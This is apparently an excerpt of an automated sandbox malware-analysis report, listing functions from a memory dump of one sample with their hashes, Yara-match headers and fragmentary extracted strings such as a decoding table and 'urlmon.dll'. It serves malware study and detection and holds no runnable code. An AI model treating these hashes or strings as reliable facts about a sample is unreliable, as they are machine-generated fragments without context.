                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                  • Instruction ID: 32306b6f3d734c8a7afab663675fc903ddbc16905052cbb2306b5cf1dbbf46e6
                                                  • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                  • Instruction Fuzzy Hash: 53F08271C0520DEBDF14DF68E881BDDBBB8EB04320F1087AAE8249B290D73597518B81
                                                  Function 035A61DD Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                  • Instruction ID: 8074923c23378834450aae8f042b11ce810f4db7e559a9a152bae79aa3a36153
                                                  • Opcode Fuzzy Hash: 460fe761b3f9d143aa16b5ebcebe51c1126fa60666e44c529ddd96764ff84967
                                                  • Instruction Fuzzy Hash: 00E04F36A41A1427D230A58DAC05F9FB7AD9FC1A60F1D0065FE089B351E564A90082E4
                                                  Function 035A402D Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction ID: 37a0d7bfbba18630dca64a9a38d74407400976d5e9d20fd25285487d92ef77e6
                                                  • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction Fuzzy Hash: 29E0467A214618BBC620EA99EC00E9B77ACEFC5A10F118415FA1CAB242D674B915CBA0

                                                  Non-executed Functions

                                                  Function 0358EA9F Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                  • API String ID: 0-3248090998
                                                  • Opcode ID: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                  • Instruction ID: a7894b9064cd4ca76020ed3a9ab0f6f4760303963a1a445998f7a1d68b64ebb2
                                                  • Opcode Fuzzy Hash: 7073e3ffd2b2dc40edfc1bfaad8272e51c01e4975561a4e11492259069ee833a
                                                  • Instruction Fuzzy Hash: FD911FF09052A98ACB118F55A4603DEBF71BB95204F1581EDC6AA7B203C3BE4E85DF90
                                                  Function 0358EAAD Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                  • API String ID: 0-3248090998
                                                  • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                  • Instruction ID: ae4337c1e7adc30f564ea9669a3b411fbb0ea9f5feff87fcad2733e65b9c993e
                                                  • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                  • Instruction Fuzzy Hash: 47910FF09052A98ACB118F55A4603DFBF71BB85204F1581EDC6AA7B243C3BE4E85DF90
                                                  Function 0359D64D Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                  • API String ID: 0-1002149817
                                                  • Opcode ID: c1d8dffeb128b65626f1bc1336d5bfec71eb11460b7d3b26f64b953088930e45
                                                  • Instruction ID: 2c1f3db32cd1a9c0e9eff7733791cabf053ae8970c49cedc166ddbf93be0f536
                                                  • Opcode Fuzzy Hash: c1d8dffeb128b65626f1bc1336d5bfec71eb11460b7d3b26f64b953088930e45
                                                  • Instruction Fuzzy Hash: 42C12DB5C012699AEB20DFA4DC44BDEBBB9BF44304F0081DAD50CBB251E7B55A88CF61
                                                  Function 03584F4E Relevance: 33.9, Strings: 27, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "+$"3$0$3M$90$;$<$?y$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$uS$|~$/$]$m
                                                  • API String ID: 0-1871129808
                                                  • Opcode ID: 4138fb7b037ddf7676a6b2b892c1383bad63059a5f0fb6dd3b070bb5fef657ec
                                                  • Instruction ID: a9e871e8bdb89cd428a288e97aed2bb7b60743b98226787a00565aebf00c6a4e
                                                  • Opcode Fuzzy Hash: 4138fb7b037ddf7676a6b2b892c1383bad63059a5f0fb6dd3b070bb5fef657ec
                                                  • Instruction Fuzzy Hash: E3A137B0C05669CBEB61CF51C9987CEBBB5BB05308F1081D9C5483B281CBBA1B89CF95
                                                  Function 0359A49D Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                  • API String ID: 0-3236418099
                                                  • Opcode ID: d69fbdfddf7cc319be2a4bd71b644b03330d9b523c57984640f49f1c9827482b
                                                  • Instruction ID: 0aa39e355fba0dccaf86f0d97efc940ab3fe86a1a7f0e9408dd6e1fcf0a383b0
                                                  • Opcode Fuzzy Hash: d69fbdfddf7cc319be2a4bd71b644b03330d9b523c57984640f49f1c9827482b
                                                  • Instruction Fuzzy Hash: DD916EB5900729AEEB20DF94EC41FEEB7BCFF84304F044599E508AA150E7755B498F61
                                                  Function 03595C2D Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                  • API String ID: 0-392141074
                                                  • Opcode ID: 193252ee7f0a7f66c7532e54434fc4baa63b0fd9c043baa8c72dbe5408b34521
                                                  • Instruction ID: 7b203d5ff66ec55b635653cb8973e48852d6b8a099d475c4a95162499d785188
                                                  • Opcode Fuzzy Hash: 193252ee7f0a7f66c7532e54434fc4baa63b0fd9c043baa8c72dbe5408b34521
                                                  • Instruction Fuzzy Hash: 04712DB6C10718AADB25DFA4DC80FEEB7BCBF48700F08459EE508AA150E77567488F65
                                                  Function 0358981D Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                  • API String ID: 0-685823316
                                                  • Opcode ID: 8c56873e0fb5c261957f6c6022587a8c3504701b3a54a09c545a07bc71e2431f
                                                  • Instruction ID: 4ee6482b81810d557b09df42c44e46dcbaa3378b472064b3bd28044b928b8e2c
                                                  • Opcode Fuzzy Hash: 8c56873e0fb5c261957f6c6022587a8c3504701b3a54a09c545a07bc71e2431f
                                                  • Instruction Fuzzy Hash: B42173B5D11318AAEF40DFD4DC45FEEBBB9BF48704F04815DE618BA180DBB516488BA4
                                                  Function 03589814 Relevance: 13.8, Strings: 11, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                  • API String ID: 0-685823316
                                                  • Opcode ID: 89986c91cae4fb8adebed574e79f6d661841291eaa341712259d232eb760e7cb
                                                  • Instruction ID: 43e2d5ddbbf1ea6d860d51cb74a22d0b755870a29222214ad898a645e2761085
                                                  • Opcode Fuzzy Hash: 89986c91cae4fb8adebed574e79f6d661841291eaa341712259d232eb760e7cb
                                                  • Instruction Fuzzy Hash: 78315EB5D51318AAEF00DFE4DC84BEEBBB9BF48704F04815DE614BA180DBB516488BA4
                                                  Function 0359A95D Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                                  • API String ID: 0-2304485323
                                                  • Opcode ID: 6a4ceda7aca637904eb3e6ff93f81f390a259579abdd904f3d9c5f21f3b81442
                                                  • Instruction ID: dc76551319a54a892a722f624b00cf1323d1a930b33419d7b095b3cc86d46099
                                                  • Opcode Fuzzy Hash: 6a4ceda7aca637904eb3e6ff93f81f390a259579abdd904f3d9c5f21f3b81442
                                                  • Instruction Fuzzy Hash: F0D1DAB5900709AFDB50DFA4DC81FEEB7B8FF98200F44451EE519AB150EB78A945CBA0
                                                  Function 03581FED Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2$B$F$G$N$O$]$j$w
                                                  • API String ID: 0-1040731978
                                                  • Opcode ID: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                  • Instruction ID: 92f6190bdd63bd7f8e4061b0ec6f9836106c59d7f362eb9e2cd184cbb56d02e1
                                                  • Opcode Fuzzy Hash: 7210076507284f15942e4cf1ad312c589d45197e70ff81a55555d79cdec020c0
                                                  • Instruction Fuzzy Hash: 9111CC20D0C3CAD9DB12D7BC84086AEBF715F13228F4886D9D5E43A2D2C27A4606D7A6
                                                  Function 03590CD8 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$P$e$i$m$o$r$x
                                                  • API String ID: 0-620024284
                                                  • Opcode ID: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                  • Instruction ID: 53ebec986a334e3df62778ad3c4bc6b69f02b824a762c9f12815e49c14969468
                                                  • Opcode Fuzzy Hash: 8dc99e8969a681838e578b5bd6c0733433eee2398cc79a3174b6aabb256fe285
                                                  • Instruction Fuzzy Hash: 0541B5B6C10318A6DB10EFA4DC41FDE777CBF84300F0485DAA548AB151EAB497499FA0
                                                  Function 03590CDD Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$P$e$i$m$o$r$x
                                                  • API String ID: 0-620024284
                                                  • Opcode ID: 9761d9d745d7c324248c7b204cb5c2bd6b6890f91a5da996bbaf399d7060d359
                                                  • Instruction ID: 69203be95920fffe432fb43195c0f4cefac7b2a728fe8b2acf4b2fb420c96743
                                                  • Opcode Fuzzy Hash: 9761d9d745d7c324248c7b204cb5c2bd6b6890f91a5da996bbaf399d7060d359
                                                  • Instruction Fuzzy Hash: 204192BAC10718A6DB20EFA4DC41FDE777CBF84300F048599A549AB151EAB497899FA0
                                                  Function 0357E447 Relevance: 10.1, Strings: 8, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$@MSJ$@MSJ$F[HQ$GM@U$S$WRWF$}
                                                  • API String ID: 0-2245592833
                                                  • Opcode ID: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                  • Instruction ID: cdfe8bac769ef543cb2fba232f2cc6486e7bace2ab974cf4a98ddaae178b0679
                                                  • Opcode Fuzzy Hash: a9ceaada0cefef7e545ff48661fe9cc00ff8aadd23d3314ff585706100d8a8c6
                                                  • Instruction Fuzzy Hash: 4D310DB0D412889ACF14CFD0E9452EEBFB0BB01304FA4859CC51ABF611D7769A52CF96
                                                  Function 0359DEAD Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$S$\$a$c$e$l
                                                  • API String ID: 0-3322591375
                                                  • Opcode ID: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                  • Instruction ID: 9dfe05d5087dbc7a11e7cea43ea1ac8af058cf8e3dee3f99485f8680889e0dae
                                                  • Opcode Fuzzy Hash: e6ab931d446092fced8b124636bf90d359690adc171833196a9697c414dd6c59
                                                  • Instruction Fuzzy Hash: 974187B6C00658AADF50DF98EC85FEEB7F8BF88300F09455AD909AB110E77155458F94
                                                  Function 035959ED Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F$P$T$f$r$x
                                                  • API String ID: 0-2523166886
                                                  • Opcode ID: 8972755162165276a913683ffe4d7b88cfaf20b31921afb0a759977e9178cb04
                                                  • Instruction ID: ed4e37b489d5f7140e0c8f8e1bd2ab56fc9d1311dca43c3967f9626269471e5a
                                                  • Opcode Fuzzy Hash: 8972755162165276a913683ffe4d7b88cfaf20b31921afb0a759977e9178cb04
                                                  • Instruction Fuzzy Hash: 1651F771900705AEEB35DF64EC44BAEF7F8FF45704F04495AE4095A1A0E3B4A598CFA1
                                                  Function 035959E0 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: F$P$T$f$r$x
                                                  • API String ID: 0-2523166886
                                                  • Opcode ID: af80cd81b237028a37187469a3622ea4c6ecb89949024ccac622ac4786cc3de4
                                                  • Instruction ID: 0333867a11888fd423d344d824f3e69dd0c4b61ecc4a7a423ce647c8f0841995
                                                  • Opcode Fuzzy Hash: af80cd81b237028a37187469a3622ea4c6ecb89949024ccac622ac4786cc3de4
                                                  • Instruction Fuzzy Hash: 6D018471C1171DABDB10EFA59844ADEBFB9FF41710F048659D8146F210E3B65909CBD1
                                                  Function 035956BD Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $22.&$e$h$o
                                                  • API String ID: 0-4050626514
                                                  • Opcode ID: 26e8c2bff9c8dd8734dd863b376034b46160e7d9eb8fe836816d9637162d56df
                                                  • Instruction ID: 2651204546d65a4e77a802eb8977c87dd9b9b00e9edd2c2477b4e01f9d600191
                                                  • Opcode Fuzzy Hash: 26e8c2bff9c8dd8734dd863b376034b46160e7d9eb8fe836816d9637162d56df
                                                  • Instruction Fuzzy Hash: 968174B6C003596ADB65EB54DC81FEE73BCFF88200F4445DBE5096A050EE746B858FA1
                                                  Function 035950ED Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $i$l$o$u
                                                  • API String ID: 0-2051669658
                                                  • Opcode ID: d3dc1fb3fc8baa54e92143daec59ffbdf1b0a6f7811ee2e118e7b31411fe2d31
                                                  • Instruction ID: 591a442a7ac238541a0f4fe470cff084f8c822e2316940b60135e7f01bc1fc09
                                                  • Opcode Fuzzy Hash: d3dc1fb3fc8baa54e92143daec59ffbdf1b0a6f7811ee2e118e7b31411fe2d31
                                                  • Instruction Fuzzy Hash: 6C617EB1900704AFDF21DFA4DC84FEFB7FCAB89710F144959E559AB240E774AA418BA0
                                                  Function 035950EB Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $i$l$o$u
                                                  • API String ID: 0-2051669658
                                                  • Opcode ID: 130614bc12c282eac25d71e1d20c34b0e1790ea8c942a5f937affb9be773956a
                                                  • Instruction ID: 7a9b3c5fcfbbcbdeb2c285e478582afcb32b02efe72d26d219a7362056722846
                                                  • Opcode Fuzzy Hash: 130614bc12c282eac25d71e1d20c34b0e1790ea8c942a5f937affb9be773956a
                                                  • Instruction Fuzzy Hash: D5414DB1900708AFDB20DFA5DC84FEFBBFDAB89700F104559E555AB240E770AA45CB60
                                                  Function 035956B5 Relevance: 6.4, Strings: 5, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $22.&$e$h$o
                                                  • API String ID: 0-4050626514
                                                  • Opcode ID: 15cbd106b953ebf4559c4cacca26bee1b99d2c29c22be48b993bc1cbdbb418e4
                                                  • Instruction ID: e5cc01c7f59ded43da4b7d8c9ec38e83fafd1abe47a060573d0980983c0e2c14
                                                  • Opcode Fuzzy Hash: 15cbd106b953ebf4559c4cacca26bee1b99d2c29c22be48b993bc1cbdbb418e4
                                                  • Instruction Fuzzy Hash: D7416376C00359AADB50EF64DC41FEEB7B8FF44700F4085DAA548BA151EB746B848FA1
                                                  Function 03594D7D Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $e$k$o
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                  • Instruction ID: 374480c2ab279dfa48092f29fc61230d6e9c805453d3fe89a8878c2f74abf591
                                                  • Opcode Fuzzy Hash: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                  • Instruction Fuzzy Hash: ABB12AB5A00309AFDB24DBA4DC84FEFB7BDBF88700F148959F61997240D675AA41CB90
                                                  Function 03594D7A Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $e$k$o
                                                  • API String ID: 0-3624523832
                                                  • Opcode ID: 9a489d3a1622744180dd4f7a6956fe07d2e91ebc088a74dc88528920c0942781
                                                  • Instruction ID: 086907ed9a6ee34aa3a37e0b26c26b3faab63c1e70a4c69db9f5a7b915c93987
                                                  • Opcode Fuzzy Hash: 9a489d3a1622744180dd4f7a6956fe07d2e91ebc088a74dc88528920c0942781
                                                  • Instruction Fuzzy Hash: 436129B5A00309AFDB14DFA4DC84FEFB7BDAF88704F148559E6199B240D631AA41CB60
                                                  Function 03594C3D Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                  • API String ID: 0-2877786613
                                                  • Opcode ID: 7d4a3fd5e132dfff744daa4e8bc37511056fa7d583422e8b803d3306fe892f4b
                                                  • Instruction ID: 0ab889d4dfc897962b0e73ca02a0bfc5230377f7a6f304c9c283c83b36f9362f
                                                  • Opcode Fuzzy Hash: 7d4a3fd5e132dfff744daa4e8bc37511056fa7d583422e8b803d3306fe892f4b
                                                  • Instruction Fuzzy Hash: A4416DB5911A59BBEB01EF94EC46FFF777CAF95600F044049FA006A190E7746A0187A6
                                                  Function 03594C3A Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                  • API String ID: 0-2877786613
                                                  • Opcode ID: 55391bdd7390a9a403b881ec687fc0e8a690a10314ef88b169d42c784eb4a4d7
                                                  • Instruction ID: 631f52cd7ef394536a497d562316bd3193bee7d37ca2fd4cd9ecf0197a5e75b9
                                                  • Opcode Fuzzy Hash: 55391bdd7390a9a403b881ec687fc0e8a690a10314ef88b169d42c784eb4a4d7
                                                  • Instruction Fuzzy Hash: D4318F75A11A59BFEB01EF94EC46FFF7B7CAF95600F044049FA006A190E7746A0187B6
                                                  Function 035950E9 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: i$l$o$u
                                                  • API String ID: 0-4276214597
                                                  • Opcode ID: 87fd1f103a96a2b3fbbf3b9fa82e7d6d42cae48c2b538c3bb703dfba4e703078
                                                  • Instruction ID: 3686e58da21ec29b906695be41398cf4a7168fb9d0410d1de18c7e24456256b4
                                                  • Opcode Fuzzy Hash: 87fd1f103a96a2b3fbbf3b9fa82e7d6d42cae48c2b538c3bb703dfba4e703078
                                                  • Instruction Fuzzy Hash: B64160B1900308AFDF11DFA9DC84BEEBBF9BB89710F104959E155AB240E770AA41CB50
